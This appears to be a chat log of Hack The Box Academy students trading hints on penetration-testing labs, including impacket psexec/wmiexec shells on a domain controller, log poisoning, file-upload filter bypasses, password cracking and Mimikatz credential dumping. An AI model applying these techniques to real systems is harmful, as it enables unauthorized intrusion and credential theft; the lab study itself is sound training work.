maybe the victim box despawned lol
You can try adding this to the end /tls-seclevel:0
https://academy.hackthebox.com/module/147/section/1319 we agree you need to crack the root password or find it on the system ?
Thanks for the suggestion but I think it's the box at this point.
Module ADCS attacks, section ESC10. Why doesn't psexec print flag but wmiexec does?
└─$ KRB5CCNAME=Administrator.ccache wmiexec.py -k -no-pass LAB-DC.LAB.LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Windows\System32\rbcd.txt
{FLAG}
C:\>exit
┌──(kali㉿kali)-[/tmp]
└─$ KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass LAB-DC.LAB.LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on LAB-DC.LAB.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file pepPLMKe.exe
[*] Opening SVCManager on LAB-DC.LAB.LOCAL.....
[*] Creating service rwYV on LAB-DC.LAB.LOCAL.....
[*] Starting service rwYV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.3772]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type C:\Windows\System32\rbcd.txt
The system cannot find the file specified.
you sure that's the right path?
also check the access permissions
Yes, because I get the flag using different method and the question directly says the flag
I'm just wondering why psexec doesn't give that
windows wouldn't tell you "The system cannot find the file specified." if the file is there
system32 is a weird place for the flag
But the file exists in that location
clearly it doesn't
ESC10, only question
Abuse ESC10 and Resource-Based Constrained Delegation to compromise the DC and submit the content of the flag C:\Windows\System32\rbcd.txt
C:>type C:\Windows\System32\rbcd.txt
{FLAG}
I just removed the flag value for obv reasons
k but a shell is a shell. and your command literally says "cannot find the file", so you're in the wrong location
It's a full path; one shell finds it and the other doesn't
are there any redirections?
You probably either have no file access permissions or it's a redirection issue
also isn't it flag.txt not rbcd.txt?
@cloud urchin Abuse ESC10 and Resource-Based Constrained Delegation to compromise the DC and submit the content of the flag C:\Windows\System32\rbcd.txt
This is the question 😄
alright
Would be nice if someone else can confirm this behavior
smbexec manages to print flag too
no idea
hi guys! I have a problem... In the module Using Web Proxies -> Proxying Tools I set the .conf file for proxychains, but once I try to run it with curl, OWASP ZAP doesn't capture anything, also with Metasploit.
I also added an HTTP proxy in OWASP ZAP and modified the proxychains.conf but it still doesn't work
anyone ?
I would go back over that part of the module. https://dev.to/adamkatora/how-to-use-burp-suite-through-a-socks5-proxy-with-proxychains-and-chisel-507e
Do you know if it is also possible with OWASP ZAP?
not sure, but i'd wager zap probably can do it
If you follow the section from start to finish you will have your answer
I find the files but it takes 2 hours to crack and at the end there's nothing :/
did you use the mutated list?
Use the mutated password list constructed from the mutated passwords section
ok thx
In the file inclusion skill assessment, I found the admin panel and I'm trying log poisoning, but the php payload won't work. I intercepted the request with Burp Suite but it's always blank, and when I assign ?cmd=id, the log breaks
Can I DM someone to show them the steps I did and the hash I found?
Just put the whole line with root in its own file and try and crack it
guys, I'm a bit stuck in the Footprinting - SMTP module. I've tried || smtp_user_enum command with more response timeout with some wordlists, Metasploit smtp_enum scanner, and nmap smtp_enum_users.nse ||. It gives a lot of users but none is correct, any info or advice?
finally done with the malware analysis module. Thank goodness
Alright I give up, any tips on getting the .203 IP on the Foothold DNS module? I've tried n0kovo, sortedcombined-dns-recon-fierce, bitquark, top 11000. Kinda tired of waiting a million years for nothing.
that's a funny looking user agent you've got going on there, why do you trim the bees and simplify your system to just basic commands
Pivoting, Tunneling, and Port Forwarding
Skills Assessment
Q.3 Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.
I know this is a silly one but I am not able to do a ping sweep and not even able to get a shell on my Kali from the web shell. I know I am missing something silly but not getting it.
Got creds of mle*** and I am thinking of using them with xfreerdp (due to practice with all other sections in the module) but not sure how to do proxychains here
That module comes with a wordlist. And smtp_user_enum is the right way forward
The section has a wordlist you can use
The nse script is stupid imo, and requires you to research how to pass script args
no way HASHDAHSD
;/
it's good lol it's the problem ahah
enumerate more
Yeah I get it, but where? Checked all inside ports, NICs
If you have what you say you have then what you also want is right there too, and if you go back to the basics you'll know what to use it with
Hello. I am working on the module "Password attacks" and specifically doing the question related to the section "Password Mutations". I have created a password list and hydra is telling me that it will take 2 hours, which is not so long (but not so short either). I am just wondering, when you are working on a box, do you generally try a brute-force attack on the different services you enumerate? Or do you do it only when you are out of solutions?
Okay cool I’m working on this and restarting from basic
Don't attack ssh
Lmao I just wanted to leave a mark in the logs so I can read easily where the commands should be executed
I tried doing just the php payload but didn’t work, or rather the log crashes
But you usually attempt brute force attack on any other services when you work on a box, don't you?
There's other services running, enumerate
Ssh is painfully slow
Referring to available and mentioned tools ig
I'm doing "Windows Privilege Escalation Skills Assessment - Part I" and I'm trying to get JuicyPotato to run. I'm checking different CLSIDs but I'm not sure if I gotta keep checking different ones or if my command is wrong
you could go caramelize onions before brute forcing ssh finishes
At least with hydra
Ssb tool goes brrr
I thought this tool's ascii art looked like a 🖕 for a second
It very well could
omg I was using ?cmd=id instead of &cmd=id
I lost 3 hours due to this lmao
Zodiac case vs the watcher case
Hey, I am doing "attacking on sql databases" and finally got the mssqlsvc hash and password. When I am trying to log in it says "mssql: login error: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication." Any hints?
Did you try a simpler PHP payload?
SQLMap Essentials module. question "What's the contents of table flag5? (Case #5)" I get 2 different flags to appear somehow, but says they are both wrong
can someone give me a nudge for AD enumeration & attack skills assessment part 2 q1?
[*] Exploit completed, but no session was created.
why do I keep getting this error
I've copied and pasted the exact same info apart from replacing the rhost and lhost (tun0)
mine is failing at the highlighted
Start at the beginning, every technique is used
Is there someone that knows why this is happening when I try to use mssqlclient.py? "[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'no protocols available')]
"
It looks like it's using ssl? Idk
yes, but what does this mean? [('SSL routines', '', 'no protocols available')], I cannot log in to the database
It means it, for whatever reason, isn't detecting ssl maybe? Adding -v will be more verbose
for impacket it's -debug
Thx
is your impacket version outdated? I've never seen problems with mssqlclient.py ssl, it should just switch without problems, try to update/reinstall it with pipx
its so weird!
hello guys, I have a question
module - Password Attack
Section - Credential hunting in windows
I use LaZagne but it's not running on Windows 11. Do you know another method like LaZagne?
https://academy.hackthebox.com/module/147/section/1318
or which Windows does LaZagne run on?
it works in win11
I tried on my computer but it's not running
Magic byte is not required on there.
I also don't think any targets run windows 11
don't try to run tools on your own host please, use a VM if you want to test. And what do you mean not running? What's the error?
however, you will use the magic byte later on, after you successfully get the source code of upload.php
check with software publish vs vs
?
Can I send the error PNG in DM?
But we also encounter these machines in the customer environment, so I tried it
Well we can't help you on a rl engagement
definitely works in my own lab
?
my error -> this app can't run on your pc
to find a version for your pc, check with the software publisher
Hello. @short gulch @red spruce @9twek
Hope you found the answer for "how "advanced_ip_scanner.exe" was introduced to the compromised system"
Hint for others: use examples from the previous topic, find exploring USN. Go through findings, discord search :), note the SIEM crucial thing 🙂 T__e
Then you need to use the USN example in the current topic. I think it will be enough to find the answer.
Are you trying to run via gui?
Nope, I tried in cmd
download the latest version
That's right, I just wanted to know if there is a problem with the tool.
True, I will search
As the tool is just referenced/lightly shown in a module
I've been struggling with the lab assignment for over a day now. The task description mentions that Johanna's account is accessible on numerous hosts, though the specifics of these hosts seem to change with each reset. It appears that using her password to access other hosts might not be the right approach. I've managed to discover Johanna's password and used RDP to connect to the specified host. However, I'm having trouble opening the contents of a file named || L*.k ||. I've attempted to decrypt it using various password lists, including a mutated one and rockyou, but haven't had any success. Could someone please suggest which wordlist I should try next?
You already used the wordlist you are supposed to, maybe there is another tool to crack it?
Fking module. I have a serious grudge with this module now
It gets better 
[*] Exploit completed, but no session was created.
why do I keep getting this error
I've copied and pasted the exact same info apart from replacing the rhost and lhost (tun0)
mine is failing at the highlighted
Just tried it and it does work. Double check carefully that you are setting the 5 items correctly; if that still looks correct maybe try changing the VPN from UDP to TCP. I know the Windows boxes sometimes take a bit longer to spin up even though you already have an IP. Did you give it some time?
I'm not putting the rest since it's a hash to find but I don't understand why I can't find the hash for it seems so easy to me.
you try reading this part of the section? Viewing the Cracked Hash
have you tried using the mutated wordlist?
yes but nothing
that's not the issue: the issue is that he hasn't cracked it
and the password should be in the mutated wordlist
are you using a fresh mutated list
that line at the end of john is its version of "exhausted"
ahh the password.list yes, but I didn't mutate it
or are you using a cropped one as recommended from earlier sections
mutate it
this module reuses the mutated wordlist a LOT
general path to follow with this module: mutated list -> regular password list -> rockyou
I understand that this module forces us to see the notion of mutation.
not just the notion
it's literally having you reuse that mutated password list basically every time you have to crack/bruteforce
except maybe like one time
it's true
meaning don't stray from it unless forced to
oh my notes are wrong, i was showing rockyou for some reason
always start with provided resources unless the section shows you explicitly otherwise
if it's from the Notes.Zip from kira, then it's likely in a version of rockyou, maybe, but it's for sure in the mutated list
No its not in rockyou at all
the info is correct. I was already using TCP as VPN, switched to UDP and still nothing.
you said you tried it as well and it did not work?
I thought that since the zip came from the user kira, the password would necessarily be kira mutated.
it can be but it doesn't mean it will be
also all of kira's mutated passwords are in the grander mutated_password list
so it's still the same resource
you need to get into the habit of properly naming your files; hashes.zip would imply to me it's a zip file that contains hashes, not a password hash for a password protected zip
i see
no, it works for me
generally when I name my hashes i will do [username].hash(es) and output to a [username].cracked
that way when i refer back to it in my notes/system I know where it is/what i'm looking for
of course I thought just writing hash would be more meaningful
well yes; it's meaningful
same lol
sometimes the user you're looking for is hiding behind another user
if you haven't solved it yet
i found it in history
👍
but I didn't realize I needed to run 3.9 specifically
ah yeah i think the venv on the labs is running 2.7 by default
whatever is symlinked to the /usr/bin/python directory
yeahhhhhhh I was running 3 over and over. Then tried laz
and finally was like why not
yeah sometimes being super specific helps
i think the change from 3.8 -> 3.9 changed a lot of things
and eventually there'll be another leap that breaks more
such is the way of languages
Pwnbox is behaving weird. When I press any arrow key (side, top, bottom) it starts displaying characters such as (,&%' . Is it tripped? I am on the service enumeration module.
Try disabling some extensions if you have any, it sounds like something is messing with it
hey! I still have problems with proxychains. I can't capture anything with OWASP ZAP, but it also seems that proxychains with curl (like in the Using Web Proxies -> Proxying Tools module) does not work properly. I did all the things described, and I also looked for info on Google, maybe I missed a particular setting in proxychains.conf?
By the way, OWASP ZAP works fine with browsers and also with FoxyProxy, I have problems only with proxychains, Metasploit and nmap!
yeah the browser was the problem, I was using the Dolphin Anty browser. Somehow it's causing the problem.
why not use Burp?
Do you think it is a software problem of ZAP? I prefer ZAP, but I'll try Burp
with burp it works!
Thanks
Reading back through your messages, you said you did HTTP Proxy, but if you want it to go through proxychain you'll want a socks proxy
yes, I tried with a socks proxy and after a lot of fails I tried with an HTTP proxy, but with Burp it works and I have the same settings I used for ZAP, I don't understand why...
this is infuriating, I don't know what else to do here
it authenticated but no session was created
are you able to try it on pwnbox?
have you tried typing out all the commands instead of copy paste?
I had to since Pwnbox does not allow copy and paste
ok I just did it again and it worked. Like what the hell! I put the exact same info. Why is it working now! 😦
Thanks for the help brother!
it allows copy paste, click on the ssl lock or menu option just left to the url. and enable the clipboard permission.
really? i didn't know that. Sure will make things easier thanks.
So I’m on passwords module. I successfully got a few users and passwords and successfully connected to win10 machine found flag on desktop and am trying to paste it in the blank and it is not accepting the answer as being correct
Help pls
make sure there is no space before the flag
There is not
Or after
Anyone who has done this module and has this flag saved please message me so I can send you this and see if it's the same. I don't understand how it can be worn, it's the only user that I can rdp with
Wrong not worn
I'm 99% sure you need to winrm with the right user, not the one that has rdp perms
Flag is on desktop. You are right, crap, that must be a different flag
On rev shells. Used the rev shell given by module as well as revshells.com - none of them are working, the powershell just throws me about a page full of errors... I've tried different ports as well as admin powershell, and disabled AV any ideas?
Yeah there is a user for each question
Ya I got em mixed around sorry
Each user for this section has a unique service
While their creds may work for other services once you hit one they should be crossed off
Also: I suggest checking C:\users to narrow your user list down
Since you already cracked one
I have all 4
Thanks guys I am tired worked all day but persistent just need sleep
Got two flags since you helped me
Also, this is just a super general suggestion to look for local users once in it narrows your user list substantially
For AD users there's other methods
But local- super helpful
I am in the module "modern web exploitation techniques". I was able to get the flag with the second order IDOR (whitebox); now I am writing a python script to automate the process. Can someone who is in the same module help me with the script?
After a little bit of trouble shooting - worth noting that the rev shell htb gives you for that module will not work, they have it set up wrong
Stuck in the Intro to Digital Forensics module
"Investigate the USN Journal located at "C:\Users\johndoe\Desktop\kapefiles\ntfs%5C%5C.%5CC%3A$Extend$UsnJrnl%3A$J" to determine how "advanced_ip_scanner.exe" was introduced to the compromised system. Enter the name of the associated process as your answer. Answer format: _.exe"
I'm pretty sure I've identified || temp.bat || as the file that downloads advanced_ip_scanner.exe onto the system, so I'm trying to open the mft_data file in MFT Explorer to try and see what's inside the file, and it just hangs and won't open. Am I at least on the right track?
check the USN journal again
I think I'm just dumb and overlooking it, any hint?
uh so I opened the usn csv directly instead of filtering in ps like the module shows and I see a lot more but still don't think I'm on the right path
I see || trustedinstaller.exe ||, ||wmiprvse.exe || and || tiworker.exe || all downloading files right before an advanced.zip appears, but none of those worked
do you have it open in Timeline Explorer?
good evening, I'm new to the group and new to cybersecurity! Can you give me a few suggestions to help me get started please?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
yea
I mean.. yes I've searched the advanced_ip..
you see the zip file
ya
there's something you can leverage to figure out how it got there
specifically event logs
good
@dim wolf thanks
I'm stuck in the type filters section of the file uploads module. I bypassed all filters and succeeded in uploading files, but I get this error. I tried multiple allowed php extensions but none worked
got it thank you 🙂
for Password Attacks Lab - Hard, I can't get the file in SMB. I've tried impacket, smbmap, smbclient on Pwnbox and my own Kali
I tried doing it on the target Windows machine but it keeps stating no file found
Hello
hello
question : What is the type of the service of the "syslog.service"?
my input : systemctl list-units --type=service | grep syslog.service
already reset more than 10 times
looks like a connection issue, impacket's smbclient also times out?
I need help with Password Attacks, Protected Files
This question
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
I have no idea what "cracked password" they are talking about
for Kira
you've cracked their password in the previous section, use that
everyone elses target machines spawning in a timely fashion? cuz mine has been spawning for quite some time even after refreshing
why are you ignoring my question , someone should please help
question : What is the type of the service of the "syslog.service"?
same
noticed this too
Help needed for Analyzing Evil With Sysmon & Event Logs module in SOC Analyst Path
question is Replicate the Unmanaged PowerShell attack described in this section and provide the SHA256 hash of clrjit.dll that spoolsv.exe will load as your answer. "C:\Tools\Sysmon" and "C:\Tools\PSInject" on the spawned target contain everything you need.
I've followed the "attack" exactly but did not see spoolsv turn managed and no event id 7 seen in sysmon logs..
It's been a week so I don't remember it... Is there a place where it's stored?
been stuck at it.
https://academy.hackthebox.com/module/147/section/1320 try to find Kira password again sir
its fast
Death, it is?
It's not gonna be the one where I have to wait for the
thing to crack right
O lord up above, my computer is slow so it takes like an hour to crack things
use pwnbox
ok ty for the link tho
mutate loveyou and bruteforce with the list, I think it was mentioned in a hint of an earlier section
I just got the answer to this. The question actually wants you to locate clrjit.dll used by spoolsv.exe
so what you need to do is to open the properties of spoolsv using Process Hacker, locate clrjit.dll, right-click and go to file location.
use certutil to generate the hash
can i mount a smb?
mount -t cifs -o username=<user> //<ip>/<share> /mount/point
you can set the timeout for smbclient too
hello i need help in file upload skills assessment, i bypassed whitelist and blacklist filter, found uploads directory
the only thing i cant bypass is the content header
i tried adding the file signature of jpeg : ÿØÿî
but still got : only images allowed error
you probably need to edit the hex values to get the magic bytes right but iirc there's another image type that you can use
which module is that ?
try different magic bytes
i used hex editor for that
hex editor, idr using it in file uploads?
it's in burp
shadow and passwd.bak are NOT supposed to be the same contents right?
i used it to convert the hex value of magic bytes to ascii
still didnt work too
to crack the you need shadow and passwd files
no they are not
so the lab is wonky? because these are the bak files of the shadow and pass found under will
they look like both of them are passwd files
iirc you just need to use one of the mime-type mentioned in the sections
Malware analysis, dw i completed it.
You mean gif8?
Damn i turned off my pc now imma try it tomorrow :3
But ig i already tried it, maybe i used with wrong extension before hmm we shall see
GLHF
Thanks @deep bay 🙏 just sorted it out and solved the challenge.
Hello, I am having issues with the Analyzing Evil With Sysmon & Event Logs section of the Windows Event Logs & Finding Evil module. My issue is with the 3 question "Replicate the Credential Dumping attack described in this section and provide the NTLM hash of the Administrator user as your answer." So when I run Mimikatz and dump the password, i go to sysmon and search for event ID 10 and cant find anything with that ID. Is anyone able to assist?
The ntlm hash is the output from mimikatz, you don’t need to look into event logs for this question
Right, I misspoke because i got the answer but I guess i wanted to see the process too but maybe it doesn't show up in the lab environment.
Just kinda bugged me I couldn't find it lol. Thank you though 🙂
For sysmon to log anything it needs to be configured and activated, it may very well be that that didn’t happen in the lab?
@tranquil axle Very well could have, I only messed with the configurations to see ID 7 so must have overlooked ID 10
Hi everyone
can someone help me with the module of active directory enum and attack i stuck on one question from the section Privileged access
What other user in the domain has CanPSRemote rights to a host?
its really confusing
you can use bloodhound
check the ACL Enumeration section
What other user in the domain has CanPSRemote rights to a host? ACADEMY-EA-MS01 here, i have to check for this host or no
can you make it clear to me
He already did, use bloodhound as he suggested
am doing
not getting it
i firstly run sharphound.exe -c DcOnly to collect data then i opened it in bloodhound and follow the instructions in the section Privileged access
INTRODUCTION TO DIGITAL FORENSICS - Skills Assessment
Q4 : Determine the folder that contains all Mimikatz-related files and enter the full path as your answer.
Anyone can help me this :< or hint to figure it out
Hi All, need a solution or link for this task, Exploit the vulnerability and obtain the admin’s command history as Proof of Concept (PoC). for
Linux Ubuntu 4.14.252-195.483.amzn2.x86_64 #1 SMP Mon Nov 1 20:58:46 UTC 2021 x86_64 GNU/Linux, any idea where I can get it, I would appreciate any help
I don't understand what I'm doing wrong.
what's the first and last character in the curly braces
7 is first and last
that should be right, did you copy the whole thing
I did
refresh the page
Still doesn't want to accept it
dm me the flag
Can someone give me a help with the module "Crackmapexec - Vulnerability Scan Modules"
- The first goal was to detect an internal network. The flag of the first question says that we need proxychains for that
- With chisel it was possible to connect to the network: 172.16.10.5.
- The next question says that we need to find a vulnerability and get the flag of Desktop of the Domain Controllers Adm.
Here in 3 comes the problem. I don't know if i got the question right. The user given for the activity is already administrator. so what else do we need?
Try getting the flag. If it works it works
Some other labs have a similar thing where one user given can already get a flag from another exercise which you're supposed to get from a lower priv user
shrug recycling machines backfires
you sure the before H isn't a whitespace? looks a bit of a bigger gap?
or did you already fix it?
I got three different results from the same command and the third was finally the correct one
lol
Why I have only one flag the second for this module :
https://academy.hackthebox.com/module/144/section/1257
change grep "no" to grep HTB
And you ran ffuf against it?
wait now that i see
I have only the No.2 ;
you are searching through every subdomain. with ffuf you can just say oh that particular size is just an installation page. lets filter it out
?
and you are left with every page that doesnt have an installation page. where you can search again
there is a lot of subdomains maybe you legit didnt see any?
I used the list from HTB;
example. app. is different from the rest
Run ffuf against it, figure out what code the errors are generating, say 612, ctrl+c it and add -fs 612
not correct wordlist
Well namelist from sec?
yea but thats not namelist is it?
But how to "select" only under < 1000 (about size)?
/opt/vhosts?
in the module its explained.
thats just an example.
I know but...
I have more than 200.
more than 200 hits? yea but you used the -fs command wrong
